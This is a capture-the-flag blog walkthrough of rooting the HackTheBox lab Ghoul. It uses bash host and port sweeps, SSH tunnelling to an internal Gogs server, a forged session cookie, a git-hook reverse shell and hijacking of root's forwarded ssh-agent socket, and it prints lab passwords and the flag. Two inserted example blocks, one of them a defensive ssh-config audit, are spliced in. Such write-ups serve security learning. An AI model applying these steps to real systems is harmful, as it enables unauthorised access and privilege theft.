Hey fellas! This is the follow-up post on pwning Ghoul from HackTheBox. You can find part 1 of the walkthrough here.
Let's quickly jump into grabbing root.txt.
After logging in as kaneki, there were a few files present.
Notes.txt has something interesting!
The contents of the other files were:
root@Aogiri:/home/Eto# cat alert.txt
Hey Noro be sure to keep checking the humans for IP logs and chase those little shits down!
root@Aogiri:/home/kaneki# cat notes
I've set up file server into the server's network ,Eto if you need to transfer files to the server can use my pc. DM me for the access.
root@Aogiri:/home/noro# cat to-do.txt
Need to update backups.
note.txt talks about the vulnerability in Gogs, and there is a file server present, which means there is a different system. Also, there are some test accounts present.
Let's find the active machines.
The next task was to find all the other active machines. That can be done by compiling the nmap binary, but why not try writing a bash script to do the same?!
Below is the script to find the online machines using bash and ping:
#!/bin/bash
# Ping every host in 172.20.0.0/24 once, with a 1 second timeout,
# and report the ones that answer.
for i in $(seq 2 255); do
    ping -c 1 -W 1 172.20.0.$i 1>/dev/null 2>&1
    if [[ $? -eq 0 ]]; then
        echo "172.20.0.$i - Online"
    fi
done
So the script found 2 IPs online: 172.20.0.10 and 172.20.0.150.
Listing the contents of authorized_keys brought to my notice that kaneki_pub is a user on the machine with hostname kaneki-pc (whose IP is 172.20.0.150). So let's try SSHing!!!
It asks for a passphrase. Remember when the website leaked secret.php? It contained our passphrase: ILoveTouka <3, and voila, we got in. The same password is used again and again!
to-do.txt tells us that a user named AogiriTest is present.
ifconfig gives us 2 network interfaces, eth0 and eth1. Aogiri's IP is 172.20.0.10 and kaneki-pc's IP is 172.20.0.150, hence they are on the same network.
Now in the ifconfig output of kaneki-pc, we can clearly see a completely different network present, the 172.18.0.0/24 subnet. Now let's create a script to scan for ports on the eth1 interface. We can use the previously built script to find out the active machines.
172.18.0.2 came out as an active machine. So let's scan its ports.
#!/bin/bash
# Usage: bash portcheck.sh PORT  (script name is arbitrary)
# bash opens a TCP connection when you redirect to /dev/tcp/HOST/PORT;
# the redirection fails if nothing is listening, so the exit status
# tells us whether the port is open.
echo > /dev/tcp/172.18.0.2/$1 2>/dev/null
if [[ $? -eq 0 ]]; then
    echo "172.18.0.2:$1 - online"
fi
And we get 22 and 3000 as online. I just made a guess with 3000 as it's the default port for Gogs, and earlier we got some hints in the txt files.
In order to access Gogs, SSH port forwarding has to be done.
Reason? Gogs is running inside a Docker container that has no GUI. So in order to view the GUI and use Gogs in the browser, port X of the local machine has to be mapped to port 3000 of the container. That's called SSH port forwarding.
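Putting the two scripts above together, as an added example that is not the author's code: a pivot-side host and port sweep in plain bash (ping for discovery, /dev/tcp for the TCP check) with a connect timeout, so a filtered port does not hang the loop. The 172.20.0.0/24 range, 172.18.0.2 and ports 22/3000/2222 are the walkthrough's values; the other ports and the availability of the timeout command are assumptions.

```shell
#!/bin/bash
# Added example: living-off-the-land discovery from a pivot host without nmap.
# ping sweeps the pivot's network, /dev/tcp probes TCP ports with a timeout.

# port_open HOST PORT: exit 0 if a TCP connect to HOST:PORT succeeds within 1s.
# /dev/tcp is a bash feature, so the probe runs in an explicit bash; without
# the timeout a filtered port (packets silently dropped) would hang the loop.
port_open() {
    timeout 1 bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$1" "$2" 2>/dev/null
}

# alive_hosts PREFIX: print every PREFIX.N (N = 1..254) answering one ICMP echo.
# Hosts that drop ICMP are missed, so treat the result as a lower bound.
alive_hosts() {
    for i in $(seq 1 254); do
        ping -c 1 -W 1 "$1.$i" >/dev/null 2>&1 && echo "$1.$i"
    done
}

# scan_ports HOST PORT...: print HOST:PORT for each port that accepts a connect.
scan_ports() {
    host=$1
    shift
    for p in "$@"; do
        port_open "$host" "$p" && echo "$host:$p"
    done
}

# Sweep the pivot's first network, then check a handful of ports on the host
# found behind eth1 (22 = SSH, 3000 = Gogs default, 2222 = second SSH port
# seen in the walkthrough; 80/443 are generic web ports added here).
main() {
    echo "[*] hosts alive on 172.20.0.0/24:"
    alive_hosts 172.20.0
    echo "[*] open ports on 172.18.0.2:"
    scan_ports 172.18.0.2 22 80 443 2222 3000
}

# Only sweep when invoked as "bash sweep.sh run", so the file can also be
# sourced for its functions without firing 254 pings.
if [ "${1:-}" = run ]; then
    main
fi
```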
Tunneling
Press Enter and then ~C to enter the ssh command-line mode.
You can find more about SSH konami codes here: https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences/
We will be doing a local port forward. So we are listening on our box and then directing this to 172.20.0.150 (where we had our kaneki_pub) on port 22.
root@kali:~/Desktop/hackthebox/ghoul# ssh -p 5001 -i kaneki kaneki_pub@localhost
load pubkey "kaneki": invalid format
Enter passphrase for key 'kaneki':
Last login: Sun Nov 29 09:05:38 2020 from 172.20.0.10
kaneki_pub@kaneki-pc:~$
kaneki_pub@kaneki-pc:~$
kaneki_pub@kaneki-pc:~$
ssh> -L 3000:172.18.0.2:3000
After SSHing from the local machine as kaneki_pub, port 3000 of the local machine has to be forwarded, via kaneki-pc, to port 3000 of 172.18.0.2. So when I open http://localhost:3000 on the local machine, the request is actually made from kaneki-pc. I hope everything makes sense!!!
Now we have a tunnel that is listening on our port 3000 and will go to 172.18.0.2:3000.
And we get the Gogs landing page, asking for a username and password. But notice the version of Gogs.
Now a bit of previous information is required. to-do.txt reveals a username, AogiriTest, whose password can be found in the Tomcat configuration files.
Password found in the Tomcat config: test@aogiri123
Once logged into Gogs, create a repository.
root@kali:~/Desktop/hackthebox/ghoul# go run cookiegen.go
0eff81040102ff82000110011000005aff82000306737472696e670c070005756e616d6506737472696e670c060004726f6f7406737472696e670c0a00085f6f6c645f75696406737472696e670c0300013106737472696e670c05000375696405696e74363404020002
It created a Go serialized object.
Upload this file to the newly created Git repo.
The vulnerable version allows us to perform a directory traversal.
Viewing the page source gives us the information about the directory.
So now we need to do the directory traversal. If the file exists, i_like_gogits will load the data file.
And voila! We are now signed in as kaneki.
Now the Git hooks can be modified to get a reverse shell, triggered by a file upload.
Open an nc listener on the local machine and upload a file to the Gogs repo. Make a commit.
And we get a shell as the git user.
Now run an enumeration script (linenum.sh). I found the gosu binary was present. And you guessed it right, it can be used to escalate privileges.
A few more steps reveal the actual password for the user kaneki on Gogs.
I downloaded the 7z file to the local machine for analysis. git reflog got me something interesting.
# git diff e29ad43
So there were multiple passwords written in here. But the one that works is kaneki: 7^Grc%C\7xEQ?tb4
I quickly did su.
Oh man! It's not over yet!!!
I again did some more enumeration and found out that ssh-agent is running on the box.
Root is periodically logging in, hence its agent session can be hijacked and we will finally be able to log in as root on the box that is hosting all the Docker containers.
What is ssh-agent??
You can relate it to single sign-on. You give the credentials once and the agent takes care of signing in to the rest of the services. The agent keeps track of the user's identity keys and passphrases and then uses those keys to log in to other servers. ForwardAgent yes in the SSH config means the agent is also made available on the remote host, so processes there can use it.
Getting the root
- watch -n 1 ls
Watch for newly created agent sockets, and use that agent to log in as root via SSH.
There are 3 agent files already present. Whenever a new session is identified, a folder is created. cd there and run the command below.
But you need to be quick, as the session is only valid for a short time.
- root@kaneki-pc> SSH_AUTH_SOCK=agent.735 ssh root@172.18.0.1 -p 2222
The above command has to be used to log in with the hijacked session. Port 2222 is used because the earlier nmap scan identified that SSH is open on 2 ports. SSH to root@172.18.0.1 will take us directly to the main machine that hosts all the Docker containers (as 172.18.0.1 is the host's address on the bridge between the host machine and the Docker network).
root@kaneki-pc:/tmp/ssh-DDqnmNeHYt# watch -n 1 ls
root@kaneki-pc:/tmp/ssh-DDqnmNeHYt# cd ..
root@kaneki-pc:/tmp# watch -n 1 ls
root@kaneki-pc:/tmp# cd ssh-OWLSx63kgc
root@kaneki-pc:/tmp/ssh-OWLSx63kgc# ls
agent.35823
root@kaneki-pc:/tmp/ssh-OWLSx63kgc# SSH_AUTH_SOCK=agent.35823 ssh root@172.18.0.1 -p 2222
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

155 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Nov 29 08:48:01 2020 from 172.18.0.200
root@Aogiri:~# whoami
root
root@Aogiri:~# ls
log.sh  root.txt
root@Aogiri:~# cat root.txt
7c0f11041f210f4fadff7c077539e72f
root@Aogiri:~#
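The hijack above only works because root's agent socket has been forwarded onto kaneki-pc; the defender's fix is to stop forwarding it, since ProxyJump authenticates through the jump host without exposing the agent there. As an added example that is not part of the original post, here is a small POSIX sh/awk audit that walks an OpenSSH client or server config and flags the stanzas that enable agent forwarding; the config paths in audit_all are the usual defaults, and the sample config used to exercise it is constructed.

```shell
#!/bin/sh
# Added example: flag agent forwarding in OpenSSH client or server configs.
# Every "ForwardAgent yes" hands the agent socket to root on that remote host,
# which is exactly what the SSH_AUTH_SOCK hijack above relies on. The usual
# fix is "ProxyJump <host>", which tunnels through the jump host instead.

# audit_ssh_config FILE: prints one WARN/OK line per finding, tracking the
# Host/Match stanza so the report says which target the setting applies to.
audit_ssh_config() {
    awk '
    BEGIN { stanza = "(global)" }
    /^[ \t]*#/ || NF == 0 { next }                    # comments and blank lines
    { key = tolower($1); val = tolower($2) }
    key == "host" || key == "match" {                 # new stanza, keep its pattern
        stanza = $2
        for (i = 3; i <= NF; i++) stanza = stanza " " $i
        next
    }
    key == "forwardagent" && val == "yes" {
        print "WARN " stanza ": ForwardAgent yes exposes the agent socket on the remote host; use ProxyJump instead"
    }
    key == "allowagentforwarding" && val == "yes" {   # sshd_config side
        print "WARN " stanza ": AllowAgentForwarding yes lets clients forward agents to this server"
    }
    key == "proxyjump" {
        print "OK " stanza ": ProxyJump " $2
    }
    ' "$1"
}

# audit_all: run the audit over the default client and server config
# locations that exist and are readable on this machine.
audit_all() {
    for f in /etc/ssh/ssh_config /etc/ssh/sshd_config "$HOME/.ssh/config"; do
        if [ -r "$f" ]; then
            echo "== $f"
            audit_ssh_config "$f"
        fi
    done
}
```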
Well! That was a long one!!! But I got my way through! Big thanks to ippsec's walkthrough for the references I had to take while stuck!
Extras
Let's have a look at the ifconfig output for this machine!
root@Aogiri:~# ifconfig
br-1fdaa7f6f1a9: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.21.0.1  netmask 255.255.0.0  broadcast 172.21.255.255
        ether 02:42:59:85:5b:cf  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

br-26bd0e80040c: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        inet6 fe80::42:42ff:fed8:69e1  prefixlen 64  scopeid 0x20<link>
        ether 02:42:42:d8:69:e1  txqueuelen 0  (Ethernet)
        RX packets 1336  bytes 525072 (525.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1322  bytes 264314 (264.3 KB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

br-3a83615557c8: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.19.0.1  netmask 255.255.0.0  broadcast 172.19.255.255
        ether 02:42:e2:32:73:03  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

br-fceeb1f42539: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.20.0.1  netmask 255.255.0.0  broadcast 172.20.255.255
        inet6 fe80::42:e1ff:feda:39ef  prefixlen 64  scopeid 0x20<link>
        ether 02:42:e1:da:39:ef  txqueuelen 0  (Ethernet)
        RX packets 13439  bytes 2843945 (2.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 14422  bytes 1265247 (1.2 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:64:7b:bd:8a  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.101  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:d94c  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:d94c  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:d9:4c  txqueuelen 1000  (Ethernet)
        RX packets 14396  bytes 1168534 (1.1 MB)
        RX errors 0  dropped 43  overruns 0  frame 0
        TX packets 13026  bytes 3217119 (3.2 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 40295  bytes 2863663 (2.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 40295  bytes 2863663 (2.8 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

veth4eed7dc: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::c0a7:32ff:fec5:92a5  prefixlen 64  scopeid 0x20<link>
        ether c2:a7:32:c5:92:a5  txqueuelen 0  (Ethernet)
        RX packets 789  bytes 1207193 (1.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1084  bytes 175777 (175.7 KB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

veth524b739: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::30f7:d9ff:fee0:f277  prefixlen 64  scopeid 0x20<link>
        ether 32:f7:d9:e0:f2:77  txqueuelen 0  (Ethernet)
        RX packets 13110  bytes 2457241 (2.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13968  bytes 1190093 (1.1 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

vethf122d05: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::e4f2:f7ff:fefc:93c7  prefixlen 64  scopeid 0x20<link>
        ether e6:f2:f7:fc:93:c7  txqueuelen 0  (Ethernet)
        RX packets 1808  bytes 318386 (318.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1649  bytes 1086435 (1.0 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

vethf6a4f69: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::18d2:b2ff:feea:6cd3  prefixlen 64  scopeid 0x20<link>
        ether 1a:d2:b2:ea:6c:d3  txqueuelen 0  (Ethernet)
        RX packets 24862  bytes 3722251 (3.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 25130  bytes 3237106 (3.2 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
That's a very well designed network! Kudos to the creators of the machine. This lab provided loads of information!!
That's all for the blog post! Hope you learned something from it. See you in the next one!
Until then, happy hunting!!